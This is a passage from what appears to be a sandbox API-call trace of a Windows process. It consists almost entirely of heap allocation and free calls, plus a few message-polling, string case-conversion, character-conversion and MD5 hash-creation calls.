(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0205.878] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0205.878] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.878] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0205.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0205.879] CryptCreateHash (in: hProv=0xad28b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0205.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0205.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0205.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0205.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0205.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0205.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0205.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0205.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0205.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0205.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0205.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0205.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0205.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0205.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0205.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0205.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0205.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0205.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0205.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0205.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0205.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0205.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0205.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0205.884] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0205.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0205.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0205.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0205.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0205.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0205.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0205.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0205.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0205.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0205.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0205.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0205.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0205.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0205.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0205.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0205.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0205.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0205.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0205.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0205.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b17d8 [0205.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0205.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0205.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0205.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b1748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0205.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0205.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0205.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0205.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0205.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0205.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0205.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0205.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0205.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0205.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0205.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0205.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0205.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0205.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0205.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0205.888] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0205.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0205.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0205.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0205.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0205.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b17c8 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0205.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0205.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0205.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0205.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0205.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0205.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0205.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0205.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0205.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0205.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0205.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0205.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0205.890] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0205.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0205.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0205.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.891] WideCharToMultiByte 